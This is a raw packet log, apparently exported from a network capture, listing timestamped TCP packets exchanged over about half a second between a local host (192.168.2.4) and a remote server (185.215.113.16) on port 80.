                                                      Nov 30, 2024 18:08:42.403126001 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.403162003 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.403969049 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.404009104 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.404213905 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.404253960 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.405066013 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.405106068 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.405261993 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.405303955 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.406100988 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.406146049 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.406342983 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.406388044 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.407262087 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.407301903 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.407444954 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.407488108 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.408215046 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.408252954 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.408421040 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.408565998 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.409245014 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.409284115 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.409497976 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.409535885 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.410314083 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.410353899 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.410484076 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.410556078 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.411334038 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.411376953 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.411570072 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.411618948 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.412424088 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.412465096 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.412630081 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.412683010 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.413469076 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.413516045 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.413680077 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.413723946 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.414547920 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.414587975 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.414736986 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.414779902 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.415657043 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.415692091 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.415792942 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.415831089 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.416623116 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.416662931 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.416846037 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.416886091 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.417712927 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.417752028 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.417929888 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.417969942 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.418791056 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.418828011 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.418941975 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.418975115 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.419821978 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.419898033 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.420018911 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.420059919 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.420865059 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.420903921 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.421264887 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.421302080 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.422262907 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.422306061 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.422415018 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.422455072 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.423228979 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.423270941 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.423345089 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.423379898 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.424144983 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.424179077 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.424202919 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.424245119 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.425064087 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.425100088 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.425266027 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.425312042 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.426120996 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.426167011 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.426331997 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.426368952 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.427258968 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.427295923 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.427457094 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.427489042 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.428220034 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.428256035 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.428416967 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.428473949 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.429367065 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.429413080 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.429578066 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.429615021 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.445827961 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.445878029 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.445975065 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.446013927 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.446372032 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.446413994 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.446770906 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.446810007 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.447388887 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.447427034 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.447572947 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.447611094 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.448432922 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.448471069 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.579374075 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.579435110 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.579529047 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.579570055 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.579664946 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.579700947 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.580025911 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.580063105 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.580782890 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.580821037 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.580981970 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.581015110 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.581861973 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.581901073 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.582027912 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.582066059 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.582915068 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.582951069 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.583086014 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.583127022 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.583892107 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.583930969 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.584095955 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.584134102 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.584954023 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.584992886 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.585150003 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.585187912 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.586067915 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.586103916 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.586250067 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.586287975 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.587069988 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.587105036 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.587280989 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.587327957 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.588099003 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.588135958 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.588335037 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.588377953 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.589169979 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.589207888 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.589405060 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.589443922 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.590230942 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.590267897 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.590545893 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.590584040 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.591269970 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.591310978 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.591491938 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.591531038 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.592327118 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.592367887 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.592580080 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.592612982 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.593374968 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.593413115 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.593583107 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.593622923 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.594429970 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.594469070 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.594693899 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.594738007 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.595494032 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.595542908 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.595757008 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.595801115 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.596543074 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.596580982 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.596769094 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.596811056 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.597582102 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.597620964 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.597784996 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.597826004 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.598656893 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.598695993 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.598891973 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.598931074 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.599714041 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.599754095 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.599952936 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.599992990 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.600771904 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.600811005 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.600940943 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.600975990 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.601809025 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.601845980 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.602029085 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.602066994 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.602931023 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.602971077 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.603080988 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.603116989 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.603959084 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.604001045 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.604147911 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.604192019 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.605017900 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.605057955 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.605246067 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.605287075 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.606156111 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.606215000 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.606249094 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.606291056 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.607194901 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.607235909 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.607321978 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.607362032 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.608156919 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.608196974 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.608361006 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.608400106 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.609186888 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.609240055 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.609471083 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.609514952 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.610342026 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.610382080 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.610506058 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.610547066 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.611375093 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.611416101 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.611587048 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.611629963 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.612338066 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.612379074 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.612552881 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.612591982 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.613395929 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.613436937 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.613637924 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.613679886 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.614458084 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.614500046 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.614649057 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.614689112 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.615557909 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.615598917 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.615726948 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.615767956 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.616595030 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.616650105 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.616770029 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.616810083 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.617883921 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.617923975 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.618098974 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.618138075 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.618720055 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.618757010 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.618889093 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.618927956 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.619802952 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.619843006 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.619997978 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.620038986 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.620815992 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.620857000 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.620976925 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.621011019 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.621850014 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.621889114 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.622033119 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.622072935 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.622987986 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.623029947 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.623145103 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.623184919 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.623946905 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.623994112 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.624146938 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.624198914 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.625027895 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.625072002 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.625231981 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.625277042 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.626125097 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.626163960 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.626271009 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.626310110 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.627213955 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.627250910 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.627403975 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.627444983 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.628257990 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.628298998 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.628448963 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.628484011 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.629262924 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.629298925 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.629445076 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.629486084 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.630256891 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.630295038 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.630479097 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.630518913 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.631272078 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.631309986 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.647136927 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.647205114 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.647257090 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.647298098 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.647439003 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.647478104 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.647737026 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.647773981 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.648432016 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.648471117 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.648614883 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.648652077 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.649475098 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.649512053 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.649674892 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.649710894 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.817117929 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.817295074 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.817363977 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.817733049 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.817792892 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.818051100 CET8049837185.215.113.16192.168.2.4
